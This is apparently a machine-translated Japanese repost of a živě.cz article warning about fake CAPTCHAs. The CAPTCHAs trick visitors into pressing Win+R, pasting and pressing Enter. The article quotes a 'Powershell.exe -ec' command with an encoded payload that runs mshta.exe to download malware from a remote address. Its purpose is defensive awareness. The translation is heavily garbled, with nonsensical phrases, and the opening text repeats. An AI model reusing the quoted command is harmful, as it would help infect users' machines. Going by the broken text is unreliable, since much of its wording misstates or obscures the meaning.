日本語版
最新ニュース
世界

Win+R、Ctrl+V、コンピューターにマルウェアを入力して入力します。偽のcaptchaに注意してください -živě.cz

Captchaは開発できるように開発できます ロボットを克服します。テキストの単純なコピーから、スライダーをドラッグしたり、パズルを折り畳んだり、オブジェクトを回したりするポイントに到達しました。キャプチャだが Win+Rを押してコードを挿入することをお勧めします。。偽のcaptchaは、セキュリティ講師が指摘したようにマルウェアを配布します デビッド・クドルナ。 IT部門はまた、1月の不正検査を指摘しました オハイオ州立大学また対処されました 所得 またはフォーラム MalwareBytes。詐欺的なキャプテの例を見てみましょう。 Googleの視覚スタイルを模倣しますあなたを混乱させるために。あなたがロボットではないことを確認するために、4つのステップを踏むことを望んでいます。 Win+Rキーを押し続けます。 検証ウィンドウでCtrl+Vを押します。 キーボードのENTERを押します。 [確認]をクリックします。 偽のcaptchaは、非常に非標準の指示を持っていますコンピューターの初心者や初心者にランク付けされていない場合、あなたは確かに正しいCaptchaが原則としてだと思うでしょう 多くの手動アクションを必要とすることはできません そしてまったく 外部プログラムでの作業を必要とすることはできません。 tldr False Captchaは、マルウェアダウンロードスクリプトにコピーします。ダイアログを開き、スクリプトとvoilaを挿入するように導きます。コンピューターは、しばらくして悪意のあるコードが感染します。 疑わしい検証ウィンドウは対話です 走るコンピューターにプログラムが起動または開いたフォルダーを開始する長いWindowsコンポーネント。柔軟です。 Webアドレスを挿入すると、デフォルトのブラウザで開きます。パラメーターでプログラムを開始することもできます。 PowerShellコマンドラインの場合、スクリプトを開始します。詐欺師はこの特性を使用します。さらに、キーボードショートカットCTRL+Vがクリップボードからコンテンツを挿入することをご存知でしょう。しかし、クリップボードに何もコピーしないだけで、ダイアログに何を置くべきですか?もちろんあなた 何かがクリップボードにコピーされました。 Redditの数ヶ月の場合、それは次のとおりでした: Powershell.exe -ec bqbzaggadabhacaaigboahqadabwahmaogavac8aywbsagkaywbrahqabwbnag8algbjagwaaqbjagsalwbkag8adwbuagwabwbhagqavahqavahqawadgaiga =これは、Base64形式でエンコードされた一連の文字があるコマンドです。たとえば、アドレスに装飾ツールが存在します www.base64decode.org。デコード後に明確です。エンコードされた文字列には一見疑わしいアドレスがあります小野 -ec 彼は、エンコードされたスクリプトを開始するためにPowershellを言います。彼はプログラムを順番に開始します mshta.exe。これも長いWindowsコンポーネントであり、HTMLアプリケーションの操作に使用されます(HTA、IE Microsoft HTMLアプリケーション)。 HTAファイルを実行するだけでなく、攻撃エンティティはMSHTA.exeを悪用してスクリプトを下げることさえできます。この場合、Mshta.exeはそうします…

Win+R、Ctrl+V、コンピューターにマルウェアを入力して入力します。偽のcaptchaに注意してください -živě.cz

1738057007
2025-01-28 07:45:00

Captchaは開発できるように開発できます ロボットを克服します。テキストの単純なコピーから、スライダーをドラッグしたり、パズルを折り畳んだり、オブジェクトを回したりするポイントに到達しました。キャプチャだが Win+Rを押してコードを挿入することをお勧めします。

偽のcaptchaは、セキュリティ講師が指摘したようにマルウェアを配布します デビッド・クドルナ。 IT部門はまた、1月の不正検査を指摘しました オハイオ州立大学また対処されました 所得 またはフォーラム MalwareBytes

詐欺的なキャプテの例を見てみましょう。 Googleの視覚スタイルを模倣しますあなたを混乱させるために。あなたがロボットではないことを確認するために、4つのステップを踏むことを望んでいます。

  1. Win+Rキーを押し続けます。
  2. 検証ウィンドウでCtrl+Vを押します。
  3. キーボードのENTERを押します。
  4. [確認]をクリックします。


偽のcaptchaは、非常に非標準の指示を持っています

コンピューターの初心者や初心者にランク付けされていない場合、あなたは確かに正しいCaptchaが原則としてだと思うでしょう 多くの手動アクションを必要とすることはできません そしてまったく 外部プログラムでの作業を必要とすることはできません

tldr

False Captchaは、マルウェアダウンロードスクリプトにコピーします。ダイアログを開き、スクリプトとvoilaを挿入するように導きます。コンピューターは、しばらくして悪意のあるコードが感染します。

疑わしい検証ウィンドウは対話です 走るコンピューターにプログラムが起動または開いたフォルダーを開始する長いWindowsコンポーネント。柔軟です。 Webアドレスを挿入すると、デフォルトのブラウザで開きます。パラメーターでプログラムを開始することもできます。 PowerShellコマンドラインの場合、スクリプトを開始します。詐欺師はこの特性を使用します。

さらに、キーボードショートカットCTRL+Vがクリップボードからコンテンツを挿入することをご存知でしょう。しかし、クリップボードに何もコピーしないだけで、ダイアログに何を置くべきですか?もちろんあなた 何かがクリップボードにコピーされました。 Redditの数ヶ月の場合、それは次のとおりでした:

Powershell.exe -ec bqbzaggadabhacaaigboahqadabwahmaogavac8aywbsagkaywbrahqabwbnag8algbjagwaaqbjagsalwbkag8adwbuagwabwbhagqavahqavahqawadgaiga =

これは、Base64形式でエンコードされた一連の文字があるコマンドです。たとえば、アドレスに装飾ツールが存在します www.base64decode.org。デコード後に明確です。

偽のcaptcha.png
エンコードされた文字列には一見疑わしいアドレスがあります

小野 -ec 彼は、エンコードされたスクリプトを開始するためにPowershellを言います。彼はプログラムを順番に開始します mshta.exe。これも長いWindowsコンポーネントであり、HTMLアプリケーションの操作に使用されます(HTA、IE Microsoft HTMLアプリケーション)。 HTAファイルを実行するだけでなく、攻撃エンティティはMSHTA.exeを悪用してスクリプトを下げることさえできます。

この場合、Mshta.exeはそうします 挿入されたアドレスから何でもダウンロードしましたそれは今では非アクティブです。 おそらくマルウェアでしょう。アドレスは一見疑われています。クリップボードに挿入された文字列が終了しないまで、これは検出されません。エンコードされた文字列自体は自信を引き起こしません。

特に、より深いレベルでコンピューターで働いていない人は脆弱です。述べたように オハイオ州立大学誤ったキャプチャはこれまでに 合法的なWebサイトにあります。通常、広告システムを介して。

captchaはユーザー-Annoyingであり、そのソリューションは毎年人間性を犠牲にします 多くの時間。最近の調査によると 働いていません。その間、私たちは検証に興味をそそられました あなたは運命で3人のモンスターを殺します。もちろん、これはむしろ逸話的な問題です。発明されたキャプチャを排除する本当の方法 りんご または グーグル。人類の検証は、今日まで私たちと一緒にいます。

リソース: David Kudrna #cyber #ai🚀 / x | OTDI /オハイオ州立大学 | soko90909 / reddit | マカフィー | 中くらい | Miter Corporation | マカフィー | 赤いカナリア | サイベロン | MalwareBytesフォーラム

#WinRCtrlVコンピューターにマルウェアを入力して入力します偽のcaptchaに注意してください #živě.cz

執筆者について: nipponese

Nipponese News編集部は、国内外のニュースを日本語で分かりやすくお届けします。